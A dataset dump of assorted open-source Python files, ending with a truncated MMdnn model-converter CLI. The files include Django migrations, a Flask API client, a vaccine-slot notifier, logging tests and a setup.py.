pyd = iraf.IrafTaskFactory(taskname=_taskname, value=parfile, pkgname=PkgName,
pkgbinary=PkgBinary, function=rnlincor_iraf)
| StarcoderdataPython |
1757781 | # Generated by Django 3.2 on 2021-05-23 18:38
import autoslug.fields
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='CustomerProfile',
fields=[
('created_date', models.DateTimeField(auto_now_add=True)),
('modified_date', models.DateTimeField(auto_now=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='accounts.user')),
('profile_name', models.CharField(blank=True, max_length=50, null=True, unique=True)),
('photo', models.FileField(blank=True, null=True, upload_to='')),
('video', models.FileField(blank=True, null=True, upload_to='')),
('description', models.TextField(blank=True, null=True)),
('dob', models.DateTimeField(verbose_name='Date of birth')),
('phone_no', models.IntegerField(verbose_name='Phone number')),
('slug', autoslug.fields.AutoSlugField(unique=True)),
('current_address', models.TextField(blank=True, null=True)),
('permanent_address', models.TextField(blank=True, null=True)),
('city', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.city')),
('country', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.country')),
('post_code', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.postcode')),
('state', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.state')),
],
options={
'abstract': False,
},
),
]
| StarcoderdataPython |
44803 | <gh_stars>0
import random
from src import utils
class PlayerClass:
def __init__(
self, st_checkboxes: dict, all_items: dict, class_name: str, class_data: dict
):
self.all_items = all_items
self.st_checkboxes = st_checkboxes
self.class_name = class_name
print("Class: " + self.class_name)
self.level = 1
self.proficiency_bonus = 2
self.hit_dice = class_data["hd"]
self.min_max_stats = class_data["min_max_stats"]
self.ac = class_data["AC"]
self.proficiencies = class_data["prof"]
self.saves = class_data["saves"]
self.skill_number = class_data["skill number"]
self.skills = class_data["skills"]
self.equipment = self.select_item_option(class_data["equipment"])
self.weapons, self.armors = self.get_weapon_armor_dicts()
self.subclass = (
random.choice(list(class_data["subclass"]))
if class_data["subclass"]
else ""
)
self.languages = class_data["languages"]
self.get_features(class_data)
self.features = class_data["features"]
def class_to_dict(self):
data = {
"ClassLevel": f"{self.class_name} {self.subclass} {str(self.level)}",
"HD": "1d" + str(self.hit_dice),
"HDTotal": str(self.level),
}
for st in self.saves:
data[self.st_checkboxes[st]] = "Yes"
return data
def get_features(self, class_data: dict):
if self.class_name == "Fighter":
style = random.choice(
list(class_data["features"]["fighting style"].items())
)
class_data["features"].pop("fighting style")
class_data["features"].update({"Fighting Style: " + style[0]: style[1]})
elif self.subclass == "Draconic Bloodline":
self.ac = class_data["subclass"][self.subclass]["AC"]
self.languages = (
self.languages + class_data["subclass"][self.subclass]["languages"]
)
draconic_type = random.choice(class_data["subclass"][self.subclass]["type"])
class_data["features"].update({"Draconic Type": draconic_type})
if self.subclass:
class_data["features"].update(
class_data["subclass"][self.subclass]["features"]
)
def select_item_option(self, equipment: list) -> list:
final_list = []
for item in equipment:
item = utils.split_on_slash(item)
item = item.replace("artisan", random.choice(self.all_items["artisan"]))
item = item.replace("instrument", random.choice(self.all_items["artisan"]))
while "simple melee" in item:
simple_weapon_choice = random.choice(
list(self.all_items["weapon"]["simple"].items())
)
if (
self.all_items["weapon"]["simple"][simple_weapon_choice[0]]["melee"]
== "yes"
):
item = item.replace("simple melee", simple_weapon_choice[0], 1)
while "martial melee" in item:
martial_weapon_choice = random.choice(
list(self.all_items["weapon"]["martial"].items())
)
if (
self.all_items["weapon"]["martial"][martial_weapon_choice[0]][
"melee"
]
== "yes"
):
item = item.replace("martial melee", martial_weapon_choice[0], 1)
while "simple" in item:
item = item.replace(
"simple", random.choice(list(self.all_items["weapon"]["simple"])), 1
)
while "martial" in item:
item = item.replace(
"martial",
random.choice(list(self.all_items["weapon"]["martial"])),
1,
)
final_item = item.split(", ")
final_list = final_list + final_item
return final_list
def get_weapon_armor_dicts(self):
weapons = []
armors = []
for item in self.equipment:
if item[-1] == ")":
item = item[: len(item) - 4]
if item in self.all_items["weapon"]["simple"]:
weapon = self.all_items["weapon"]["simple"][item]
weapon["name"] = item
weapons.append(weapon)
elif item in self.all_items["weapon"]["martial"]:
weapon = self.all_items["weapon"]["martial"][item]
weapon["name"] = item
weapons.append(weapon)
if item in self.all_items["armor"]:
armors.append(self.all_items["armor"][item])
return weapons, armors
| StarcoderdataPython |
3300323 | import decimal
import uuid
import requests
import json
import functools
from dateutil.relativedelta import relativedelta
from datetime import datetime
from flask import request, current_app
from flask_restplus import Resource, reqparse
from werkzeug.datastructures import FileStorage
from werkzeug import exceptions
from sqlalchemy.exc import DBAPIError
from app.extensions import cache
from ..constants import NRIS_CACHE_PREFIX, TIMEOUT_24_HOURS, TIMEOUT_12_HOURS
def _get_datetime_from_NRIS_data(date):
return datetime.strptime(date, '%Y-%m-%d %H:%M')
def _get_NRIS_token():
result = cache.get(NRIS_CACHE_PREFIX + 'token')
if result is None:
params = {
'disableDeveloperFilter': 'true',
'grant_type': 'client_credentials',
'scope': 'NRISWS.*'
}
url = current_app.config['NRIS_TOKEN_URL']
if url is None:
raise TypeError('Could not load the NRIS URL.')
else:
resp = requests.get(
url=url,
params=params,
auth=(current_app.config['NRIS_USER_NAME'], current_app.config['NRIS_PASS']))
try:
resp.raise_for_status()
except:
raise
result = resp.json().get('access_token')
cache.set(NRIS_CACHE_PREFIX + 'token', result, timeout=TIMEOUT_12_HOURS)
return result
def _get_EMPR_data_from_NRIS(mine_no):
current_date = datetime.now()
try:
token = _get_NRIS_token()
except:
raise
if token is None:
return None
url = current_app.config['NRIS_INSPECTION_URL']
if url is None:
raise TypeError('Could not load the NRIS URL.')
else:
#Inspection start date is set to 2018-01-01 as that is the begining of time for NRIS
params = {
'inspectionStartDate': '2018-01-01',
'inspectionEndDate': f'{current_date.year}-{current_date.month}-{current_date.day}',
'mineNumber': mine_no,
}
headers = {'Authorization': 'Bearer ' + token}
try:
empr_nris_resp = requests.get(
url=current_app.config['NRIS_INSPECTION_URL'], params=params, headers=headers)
except requests.exceptions.Timeout:
raise
try:
empr_nris_resp.raise_for_status()
except requests.exceptions.HTTPError:
#TODO add logging for this error.
raise
return empr_nris_resp.json()
def _process_NRIS_data(data, mine_no):
data = sorted(
data,
key=lambda k: datetime.strptime(k.get('assessmentDate'), '%Y-%m-%d %H:%M'),
reverse=True)
most_recent = data[0]
advisories = 0
warnings = 0
num_open_orders = 0
num_overdue_orders = 0
section_35_orders = 0
open_orders_list = []
for report in data:
report_date = _get_datetime_from_NRIS_data(report.get('assessmentDate'))
one_year_ago = datetime.now() - relativedelta(years=1)
prefix, inspector = report.get('assessor').split('\\')
inspection = report.get('inspection')
stops = inspection.get('stops')
order_count = 1
for stop in stops:
stop_orders = stop.get('stopOrders')
stop_advisories = stop.get('stopAdvisories')
stop_warnings = stop.get('stopWarnings')
for order in stop_orders:
if order.get('orderStatus') == 'Open':
legislation = order.get('orderLegislations')
permit = order.get('orderPermits')
section = None
if legislation:
section = legislation[0].get('section')
elif permit:
section = permit[0].get('permitSectionNumber')
order_to_add = {
'order_no': f'{report.get("assessmentId")}-{order_count}',
'violation': section,
'report_no': report.get('assessmentId'),
'inspector': inspector,
'due_date': order.get('orderCompletionDate'),
'overdue': False,
}
num_open_orders += 1
if order.get(
'orderCompletionDate') is not None and _get_datetime_from_NRIS_data(
order.get('orderCompletionDate')) < datetime.now():
num_overdue_orders += 1
order_to_add['overdue'] = True
open_orders_list.append(order_to_add)
order_count += 1
if order.get('orderAuthoritySection') == 'Section 35':
section_35_orders += 1
if one_year_ago < report_date:
advisories += len(stop_advisories)
warnings += len(stop_warnings)
overview = {
'last_inspection': most_recent.get('assessmentDate'),
'inspector': inspector,
'num_open_orders': num_open_orders,
'num_overdue_orders': num_overdue_orders,
'advisories': advisories,
'warnings': warnings,
'section_35_orders': section_35_orders,
'open_orders': open_orders_list,
}
cache.set(NRIS_CACHE_PREFIX + mine_no, overview, timeout=TIMEOUT_24_HOURS)
return overview
| StarcoderdataPython |
1749679 | <reponame>hirossan4049/Schreen<gh_stars>0
from flask import Flask, render_template, request, redirect, url_for, Response
#from OpenSSL import SSL
#context = SSL.Context(SSL.TLSv1_2_METHOD)
#context.use_certificate("server.crt")
#context.use_privatekey("server.key")
api = Flask(__name__)
@api.route("/")
def index():
return "test\n"
if __name__ == '__main__':
#api.run(host='192.168.0.103', port=334, ssl_context=('server.crt', 'server.key'), threaded=True, debug=False)
api.run(host='192.168.0.103', port=443, ssl_context=('server.crt', 'secret.key'), threaded=True, debug=False)
# api.run(host='192.168.0.103', port=334, ssl_context=context, threaded=True, debug=False)
| StarcoderdataPython |
1601084 | from typing import List, Optional
from datetime import datetime
import time
from plyer import notification
import json
import yaml
from beepy import beep
from cowinapi import CoWinAPI, VaccinationCenter, CoWinTooManyRequests
CoWinAPIObj = CoWinAPI()
# def get_available_centers_by_pin(pincode: str) -> List[VaccinationCenter]:
# vaccination_centers = CoWinAPIObj.calendar_by_pin(pincode, CoWinAPI.today())
# if vaccination_centers:
# vaccination_centers = [vc for vc in vaccination_centers if vc.has_available_sessions()]
# return vaccination_centers
def get_available_centers_by_pin(pincode: str) -> List[VaccinationCenter]:
vaccination_centers = []
try:
vaccination_centers = CoWinAPIObj.calendar_by_pin(pincode, CoWinAPI.today())
except Exception as e:
print(e)
pass
return vaccination_centers
def notify(msg):
title = 'SLOT OPEN'
message = msg
notification.notify(title = title,
message = message,
app_icon = None,
timeout = 50)
beep(sound=1)
return
if __name__ == "__main__":
# defaults
pincode_list = []
min_age_limit = 18
with open(r'config.yaml') as file:
# The FullLoader parameter handles the conversion from YAML
# scalar values to Python the dictionary format
documents = yaml.load(file, Loader=yaml.FullLoader)
for item, doc in documents.items():
if item == "pincode_list":
pincode_list = doc
if item == "min_age_limit":
min_age_limit = doc
if item == "vaccine_type":
vaccine_type_list = doc
while True:
for pin in pincode_list:
vaccination_centers = get_available_centers_by_pin(pin)
if vaccination_centers is not None:
for vc in vaccination_centers:
msg = "{}".format(vc)
session_list = vc.get_available_sessions_by_age_limit(min_age_limit)
msg2 = ""
for s in session_list:
if s.vaccine in vaccine_type_list and s.capacity > 0:
msg2 += "\ndate:{}\tvaccine:{}\tcapacity:{}".format(s.date, s.vaccine, s.capacity)
msg += "{}\n".format(msg2)
if msg2 != "":
print(msg)
notify(msg)
time.sleep(10)
| StarcoderdataPython |
1764693 | <filename>api/app.py<gh_stars>0
import io
import numpy as np
from tensorflow.keras.applications import ResNet50, imagenet_utils
from tensorflow.keras.preprocessing.image import img_to_array
import flask
from PIL import Image
app = flask.Flask(__name__)
MODEL = ResNet50(weights="imagenet")
def prep_img(image, target):
if image.mode != "RGB":
image = image.convert("RGB")
image = image.resize(target)
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
image = imagenet_utils.preprocess_input(image)
return image
@app.route("/predict", methods=["POST"])
def predict():
data = {"success": False}
if flask.request.method == "POST":
if flask.request.files.get("image"):
image = flask.request.files["image"].read()
image = Image.open(io.BytesIO(image))
image = prep_img(image, target=(224, 224))
preds = MODEL.predict(image)
results = imagenet_utils.decode_predictions(preds)
data["predictions"] = []
for _, label, prob in results[0]:
r = {"label": label, "probability": float(prob)}
data["predictions"].append(r)
data["success"] = True
return flask.jsonify(data)
if __name__ == "__main__":
app.run(debug=True, host="0.0.0.0")
| StarcoderdataPython |
3377689 | <filename>tests/test_plotting_toys.py
import pytest
import alldecays
from alldecays.plotting.toys.toy_util import get_valid_toy_values
def test_get_valid_toy_values(data_set1):
fit = alldecays.Fit(data_set1)
with pytest.raises(AttributeError) as excinfo:
get_valid_toy_values(fit)
expected_info = "Plots skipped: Fit passed without throwing toys"
assert str(excinfo.value)[: len(expected_info)] == expected_info
fit.fill_toys(n_toys=2)
get_valid_toy_values(fit)
with pytest.raises(AttributeError) as excinfo:
get_valid_toy_values(fit, channel_counts_needed=True)
expected_info = "Plots skipped: _channel_counts not filled"
assert str(excinfo.value)[: len(expected_info)] == expected_info
fit.fill_toys(n_toys=2, store_channel_counts=True)
get_valid_toy_values(fit, channel_counts_needed=True)
| StarcoderdataPython |
34813 | import datetime
import re
import sys
import freezegun
import pytest
from loguru import logger
if sys.version_info < (3, 6):
UTC_NAME = "UTC+00:00"
else:
UTC_NAME = "UTC"
@pytest.mark.parametrize(
"time_format, date, timezone, expected",
[
(
"%Y-%m-%d %H-%M-%S %f %Z %z",
"2018-06-09 01:02:03.000045",
("UTC", 0),
"2018-06-09 01-02-03 000045 UTC +0000",
),
(
"YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ",
"2018-06-09 01:02:03.000045",
("UTC", 0),
"2018-06-09 01-02-03 000045 UTC +0000",
),
(
"%Y-%m-%d %H-%M-%S %f %Z %z",
"2018-06-09 01:02:03.000045",
("EST", -18000),
"2018-06-09 01-02-03 000045 EST -0500",
),
(
"YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ",
"2018-06-09 01:02:03.000045",
("EST", -18000),
"2018-06-09 01-02-03 000045 EST -0500",
),
(
"%Y-%m-%d %H-%M-%S %f %Z!UTC",
"2018-06-09 01:02:03.000045",
("UTC", 0),
"2018-06-09 01-02-03 000045 %s" % UTC_NAME,
),
(
"YYYY-MM-DD HH-mm-ss SSSSSS zz!UTC",
"2018-06-09 01:02:03.000045",
("UTC", 0),
"2018-06-09 01-02-03 000045 %s" % UTC_NAME,
),
(
"%Y-%m-%d %H-%M-%S %f %Z %z!UTC",
"2018-06-09 01:02:03.000045",
("EST", -18000),
"2018-06-09 06-02-03 000045 %s +0000" % UTC_NAME,
),
(
"YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ!UTC",
"2018-06-09 01:02:03.000045",
("UTC", -18000),
"2018-06-09 06-02-03 000045 %s +0000" % UTC_NAME,
),
(
"YY-M-D H-m-s SSS Z",
"2005-04-07 09:03:08.002320",
("A", 3600),
"05-4-7 9-3-8 002 +01:00",
),
(
"Q_DDDD_DDD d_E h_hh A SS ZZ",
"2000-01-01 14:00:00.9",
("B", -1800),
"1_001_1 5_6 2_02 PM 90 -0030",
),
("hh A", "2018-01-01 00:01:02.000003", ("UTC", 0), "12 AM"),
("hh A", "2018-01-01 12:00:00.0", ("UTC", 0), "12 PM"),
("hh A", "2018-01-01 23:00:00.0", ("UTC", 0), "11 PM"),
("[YYYY] MM [DD]", "2018-02-03 11:09:00.000002", ("UTC", 0), "YYYY 02 DD"),
("[YYYY MM DD]", "2018-01-03 11:03:04.000002", ("UTC", 0), "[2018 01 03]"),
("[[YY]]", "2018-01-03 11:03:04.000002", ("UTC", 0), "[YY]"),
("[]", "2018-01-03 11:03:04.000002", ("UTC", 0), "[]"),
("[HHmmss", "2018-01-03 11:03:04.000002", ("UTC", 0), "[110304"),
("HHmmss]", "2018-01-03 11:03:04.000002", ("UTC", 0), "110304]"),
("HH:mm:ss!UTC", "2018-01-01 11:30:00.0", ("A", 7200), "09:30:00"),
("UTC! HH:mm:ss", "2018-01-01 11:30:00.0", ("A", 7200), "UTC! 11:30:00"),
("!UTC HH:mm:ss", "2018-01-01 11:30:00.0", ("A", 7200), "!UTC 11:30:00"),
(
"hh:mm:ss A - Z ZZ !UTC",
"2018-01-01 12:30:00.0",
("A", 5400),
"11:00:00 AM - +00:00 +0000 ",
),
(
"YYYY-MM-DD HH:mm:ss[Z]!UTC",
"2018-01-03 11:03:04.2",
("XYZ", -7200),
"2018-01-03 13:03:04Z",
),
("HH:mm:ss[!UTC]", "2018-01-01 11:30:00.0", ("A", 7200), "11:30:00!UTC"),
("", "2018-02-03 11:09:00.000002", ("Z", 1800), "2018-02-03T11:09:00.000002+0030"),
("!UTC", "2018-02-03 11:09:00.000002", ("Z", 1800), "2018-02-03T10:39:00.000002+0000"),
],
)
def test_formatting(writer, freeze_time, time_format, date, timezone, expected):
with freeze_time(date, timezone):
logger.add(writer, format="{time:%s}" % time_format)
logger.debug("X")
result = writer.read()
assert result == expected + "\n"
def test_locale_formatting(writer, freeze_time):
dt = datetime.datetime(2011, 1, 1, 22, 22, 22, 0)
with freeze_time(dt):
logger.add(writer, format="{time:MMMM MMM dddd ddd}")
logger.debug("Test")
assert writer.read() == dt.strftime("%B %b %A %a\n")
def test_stdout_formatting(freeze_time, capsys):
with freeze_time("2015-12-25 19:13:18", ("A", 5400)):
logger.add(sys.stdout, format="{time:YYYY [MM] DD HHmmss Z} {message}")
logger.debug("Y")
out, err = capsys.readouterr()
assert out == "2015 MM 25 191318 +01:30 Y\n"
assert err == ""
def test_file_formatting(freeze_time, tmp_path):
with freeze_time("2015-12-25 19:13:18", ("A", -5400)):
logger.add(tmp_path / "{time:YYYY [MM] DD HHmmss ZZ}.log")
logger.debug("Z")
assert list(tmp_path.iterdir()) == [tmp_path / "2015 MM 25 191318 -0130.log"]
def test_missing_struct_time_fields(writer, freeze_time):
with freeze_time("2011-01-02 03:04:05.6", include_tm_zone=False):
logger.add(writer, format="{time:YYYY MM DD HH mm ss SSSSSS ZZ zz}")
logger.debug("X")
result = writer.read()
assert re.fullmatch(r"2011 01 02 03 04 05 600000 [+-]\d{4} .*\n", result)
def test_freezegun_mocking(writer):
logger.add(writer, format="[{time:YYYY MM DD HH:mm:ss}] {message}")
with freezegun.freeze_time("2000-01-01 18:00:05"):
logger.info("Frozen")
assert writer.read() == "[2000 01 01 18:00:05] Frozen\n"
| StarcoderdataPython |
3384037 | import os
import re
from setuptools import setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
def find_version(fname):
'''Attempts to find the version number in the file names fname.
Raises RuntimeError if not found.
'''
version = ''
with open(fname, 'r') as fp:
reg = re.compile(r'__version__ = [\'"]([^\'"]*)[\'"]')
for line in fp:
m = reg.match(line)
if m:
version = m.group(1)
break
if not version:
raise RuntimeError('Cannot find version information')
return version
__version__ = find_version(os.path.join("flask_page", "__init__.py"))
setup(
name='flask_page',
version=__version__,
long_description=read('README.md'),
packages=['flask_page'],
url='http://github.com/yoophi/flask-page',
license='MIT License',
author='<NAME>',
author_email='<EMAIL>',
description='Jinja2 static template page route for Flask',
include_package_data=True,
zip_safe=False,
entry_points={
},
install_requires=[
'Flask==0.10.1',
],
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| StarcoderdataPython |
158396 | #!/usr/bin/env python3
# coding: utf-8
from setuptools import setup
import subprocess
import os
def pipen(cmd):
# It's a popen, but with pipes.
return subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def out_to_str(out):
return out.decode('utf-8', 'replace').strip()
def get_git_tag():
git = pipen(['git', 'describe', '--abbrev=0'])
stdout, stderr = git.communicate()
exitcode = git.wait()
if exitcode == 128:
return None
elif exitcode != 0:
raise Exception('fail: {}'.format(out_to_str(stderr)))
else:
return out_to_str(stdout)
def get_git_describe(tag):
'''Returns the describe part without the tag.'''
git = pipen(['git', 'describe', '--always', '--long', '--dirty'])
stdout, stderr = git.communicate()
exitcode = git.wait()
if exitcode != 0:
raise Exception('fail: {}'.format(out_to_str(stderr)))
if tag is not None:
tagged = out_to_str(stdout)[len(tag):]
# If we're building directly from the tag we don't
# need git-describe. In fact, PyPI won't like it
# as it violates PEP 440. Let's return empty.
if tagged[:3] == "-0-" and "dirty" not in tagged:
return ""
version = "+" + tagged[1:]
else:
version = "+g" + out_to_str(stdout)
return version.replace('-', '.')
with open('LICENSE') as f:
license = f.read()
with open('README.md') as f:
readme = f.read()
version = {}
with open('adfotg/version.py', 'r') as f:
exec(f.read(), version)
version_string = version['VERSION']
if os.path.exists(".git"):
version_string += get_git_describe(get_git_tag())
setup(
name=version['SHORTNAME'],
version=version_string,
description='ADF On-The-Go - convert your RPi Zero to Gotek-ready USB disk',
long_description=readme,
long_description_content_type='text/markdown',
author='Robikz',
author_email='<EMAIL>',
license=license,
include_package_data=True,
packages=['adfotg'],
url='https://github.com/Zalewa/adfotg',
python_requires='>=3.5',
install_requires=[
'amitools>=0.5,<0.7',
'Flask',
],
entry_points={
'console_scripts': ['adfotg=adfotg.cli:main']
}
)
| StarcoderdataPython |
1744575 | # -*- coding: utf-8 -*-
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import RedirectView
from xisbn_app import views
admin.autodiscover()
urlpatterns = [
url( r'^admin/', admin.site.urls ),
url( r'^info/$', views.info, name='info_url' ),
url( r'^v1/josiah_filtered_alternate_isbns/(?P<isbn_value>.*)/$', views.filtered_alternates, name='josiah_filtered_alternates_url' ),
url( r'^v1/filtered_alternate_isbns/(?P<isbn_value>.*)/$', views.filtered_alternates, name='filtered_alternates_url' ),
url( r'^v1/alternate_isbns/(?P<isbn_value>.*)/$', views.alternates, name='alternates_url' ),
url( r'^$', RedirectView.as_view(pattern_name='info_url') ),
]
| StarcoderdataPython |
4829007 | from entityextractor.aggregate import EntityAggregator
from entityextractor.result import PersonResult
class TestAggregate(object):
def test_aggregator(self):
agg = EntityAggregator()
agg.add(PersonResult(agg, 'Banana', 0, 12))
assert len(agg) == 0, agg
agg.add(PersonResult(agg, 'Mr. <NAME>', 0, 12))
assert len(agg) == 1, agg
agg.add(PersonResult(agg, '<NAME>', 0, 12))
assert len(agg) == 1, agg
def test_entities(self):
agg = EntityAggregator()
agg.add(PersonResult(agg, 'Mr. <NAME>', 0, 12))
agg.add(PersonResult(agg, 'Mr. <NAME>', 0, 12))
agg.add(PersonResult(agg, '<NAME>', 0, 12))
for label, category, weight in agg.entities:
assert label == '<NAME>', label
# assert category == 'baa', label
assert weight == 3, weight
def test_merkel(self):
agg = EntityAggregator()
agg.extract('Das ist der Pudel von <NAME>', ['de', 'en'])
entities = [l for l, c, w in agg.entities]
assert '<NAME>' in entities, entities
def test_multi(self):
agg = EntityAggregator()
text = "This is a text about Foo Blubb, a leader in " \
"this industry. The should not be confused with Foo Blubb, " \
"a smaller firm."
agg.extract(text, ['en'])
entities = [l for l, c, w in agg.entities]
assert 'Foo Blubb' in entities, entities
# def test_select_label(self):
# labels = ['Mr Blue', 'Mr BLUE', 'Mr Blu', 'Mr. Blue']
# assert select_label(labels) == 'Mr Blue'
def test_phonenumber(self):
agg = EntityAggregator()
text = "Mr. <NAME> called the number tel:+919988111222 twice"
agg.extract(text, ['en'])
entities = [l for l, c, w in agg.entities]
assert '+919988111222' in entities
assert 'in' in entities
def test_country(self):
agg = EntityAggregator()
text = """This is a document about the United States. But also about
Syria and Germany.
"""
agg.extract(text, ['en'])
assert 'us' in agg.countries
# fails
assert 'de' in agg.countries
assert 'sy' in agg.countries
| StarcoderdataPython |
3364856 | from __future__ import absolute_import
import os
import unittest
import redisext.backend.redis
REDIS_HOST = os.getenv('REDIS_HOST', 'localhost')
REDIS_PORT = os.getenv('REDIS_PORT', 6379)
REDIS_DB = os.getenv('REDIS_DB', 0)
class Connection(redisext.backend.redis.Connection):
MASTER = {'host': REDIS_HOST, 'port': REDIS_PORT, 'db': REDIS_DB}
class TestCase(unittest.TestCase):
def tearDown(self):
Connection.connect_to_master().flushdb()
class KeyTestCase(TestCase):
STORAGE = None
def test_keys(self):
key, data = 'key', [{'key': 'value'}, 1, 'string', (1, 2, 3)]
self.STORAGE(key).push(data)
self.assertEqual(self.STORAGE(key).pop(), data)
| StarcoderdataPython |
1731253 | import pandas as pd
import results
from phrasegeo import Matcher, MatcherPipeline
from time import time
# load up the db
db_name = 'GNAF_VIC'
DB = f"postgresql:///{db_name}"
db = results.db(DB)
# set up the matchers
matcher1 = Matcher(db, how='standard')
matcher2 = Matcher(db, how='slow')
matcher3 = Matcher(db, how='trigram')
# pipeline setup
pipeline = MatcherPipeline([matcher1, matcher2, matcher3])
# load up the test addresses
df = pd.read_csv('phrasegeo/datasets/addresses1.csv')
addresslist = list(df['ADDRESS'].values)
# another set of test addresses
df = pd.read_csv('phrasegeo/datasets/nab_atm_vic.csv')
addresslist = list(df['address'].values)
# set up the geocoder if this hasn't already been done
# i.e., create the phrase and inverted index tables
# will throw an error if this has already been setup
# or if the GNAF has not been setup correctly
matcher.setup()
# do the matching for a single matcher
t1 = time()
matches = matcher1.match(addresslist)
t2 = time()
print(f'Matched {len(matches)} addresses in {round(t2-t1, 2)} sec.')
# do the matching through a pipeline
t1 = time()
matches = pipeline.match(addresslist)
t2 = time()
print(f'Matched {len(matches)} addresses in {round(t2-t1, 2)} sec.')
# convert to a pandas dataframe
df_matches = pd.DataFrame(matches)
df_matches.to_csv('/Users/vic2e3a/Desktop/Data/GNAF/outputs_2021/nab_atm_geocoded.csv', index=False) | StarcoderdataPython |
3280550 | <reponame>ankitshah009/MMdnn<gh_stars>1000+
import sys as _sys
import google.protobuf.text_format as text_format
from six import text_type as _text_type
def _convert(args):
if args.inputShape != None:
inputshape = []
for x in args.inputShape:
shape = x.split(',')
inputshape.append([int(x) for x in shape])
else:
inputshape = [None]
if args.srcFramework == 'caffe':
from mmdnn.conversion.caffe.transformer import CaffeTransformer
transformer = CaffeTransformer(args.network, args.weights, "tensorflow", inputshape[0], phase = args.caffePhase)
graph = transformer.transform_graph()
data = transformer.transform_data()
from mmdnn.conversion.caffe.writer import JsonFormatter, ModelSaver, PyWriter
JsonFormatter(graph).dump(args.dstPath + ".json")
print ("IR network structure is saved as [{}.json].".format(args.dstPath))
prototxt = graph.as_graph_def().SerializeToString()
with open(args.dstPath + ".pb", 'wb') as of:
of.write(prototxt)
print ("IR network structure is saved as [{}.pb].".format(args.dstPath))
import numpy as np
with open(args.dstPath + ".npy", 'wb') as of:
np.save(of, data)
print ("IR weights are saved as [{}.npy].".format(args.dstPath))
return 0
elif args.srcFramework == 'caffe2':
raise NotImplementedError("Caffe2 is not supported yet.")
elif args.srcFramework == 'keras':
if args.network != None:
model = (args.network, args.weights)
else:
model = args.weights
from mmdnn.conversion.keras.keras2_parser import Keras2Parser
parser = Keras2Parser(model)
elif args.srcFramework == 'tensorflow' or args.srcFramework == 'tf':
assert args.network or args.weights
if not args.network:
if args.dstNodeName is None:
raise ValueError("Need to provide the output node of Tensorflow model.")
if args.inNodeName is None:
raise ValueError("Need to provide the input node of Tensorflow model.")
if inputshape is None:
raise ValueError("Need to provide the input node shape of Tensorflow model.")
assert len(args.inNodeName) == len(inputshape)
from mmdnn.conversion.tensorflow.tensorflow_frozenparser import TensorflowParser2
parser = TensorflowParser2(args.weights, inputshape, args.inNodeName, args.dstNodeName)
else:
from mmdnn.conversion.tensorflow.tensorflow_parser import TensorflowParser
if args.inNodeName and inputshape[0]:
parser = TensorflowParser(args.network, args.weights, args.dstNodeName, inputshape[0], args.inNodeName)
else:
parser = TensorflowParser(args.network, args.weights, args.dstNodeName)
elif args.srcFramework == 'mxnet':
assert inputshape != None
if args.weights == None:
model = (args.network, inputshape[0])
else:
import re
if re.search('.', args.weights):
args.weights = args.weights[:-7]
prefix, epoch = args.weights.rsplit('-', 1)
model = (args.network, prefix, epoch, inputshape[0])
from mmdnn.conversion.mxnet.mxnet_parser import MXNetParser
parser = MXNetParser(model)
elif args.srcFramework == 'cntk':
from mmdnn.conversion.cntk.cntk_parser import CntkParser
model = args.network or args.weights
parser = CntkParser(model)
elif args.srcFramework == 'pytorch':
assert inputshape != None
from mmdnn.conversion.pytorch.pytorch_parser import PytorchParser040
from mmdnn.conversion.pytorch.pytorch_parser import PytorchParser151
import torch
model = args.network or args.weights
assert model != None
if torch.__version__ == "0.4.0":
parser = PytorchParser040(model, inputshape[0])
else:
parser = PytorchParser151(model, inputshape[0])
elif args.srcFramework == 'torch' or args.srcFramework == 'torch7':
from mmdnn.conversion.torch.torch_parser import TorchParser
model = args.network or args.weights
assert model != None
parser = TorchParser(model, inputshape[0])
elif args.srcFramework == 'onnx':
from mmdnn.conversion.onnx.onnx_parser import ONNXParser
parser = ONNXParser(args.network)
elif args.srcFramework == 'darknet':
from mmdnn.conversion.darknet.darknet_parser import DarknetParser
parser = DarknetParser(args.network, args.weights, args.darknetStart)
elif args.srcFramework == 'coreml':
from mmdnn.conversion.coreml.coreml_parser import CoremlParser
parser = CoremlParser(args.network)
else:
raise ValueError("Unknown framework [{}].".format(args.srcFramework))
parser.run(args.dstPath)
return 0
def _get_parser():
import argparse
parser = argparse.ArgumentParser(description = 'Convert other model file formats to IR format.')
parser.add_argument(
'--srcFramework', '-f',
type=_text_type,
choices=["caffe", "caffe2", "cntk", "mxnet", "keras", "tensorflow", 'tf', 'torch', 'torch7', 'onnx', 'darknet', 'coreml', 'pytorch'],
help="Source toolkit name of the model to be converted.")
parser.add_argument(
'--weights', '-w', '-iw',
type=_text_type,
default=None,
help='Path to the model weights file of the external tool (e.g caffe weights proto binary, keras h5 binary')
parser.add_argument(
'--network', '-n', '-in',
type=_text_type,
default=None,
help='Path to the model network file of the external tool (e.g caffe prototxt, keras json')
parser.add_argument(
'--dstPath', '-d', '-o',
type=_text_type,
required=True,
help='Path to save the IR model.')
parser.add_argument(
'--inNodeName', '-inode',
nargs='+',
type=_text_type,
default=None,
help="[Tensorflow] Input nodes' name of the graph.")
parser.add_argument(
'--dstNodeName', '-node',
nargs='+',
type=_text_type,
default=None,
help="[Tensorflow] Output nodes' name of the graph.")
parser.add_argument(
'--inputShape',
nargs='+',
type=_text_type,
default=None,
help='[Tensorflow/MXNet/Caffe2/Torch7] Input shape of model (channel, height, width)')
# Caffe
parser.add_argument(
'--caffePhase',
type=_text_type,
default='TRAIN',
help='[Caffe] Convert the specific phase of caffe model.')
# Darknet
parser.add_argument(
'--darknetStart',
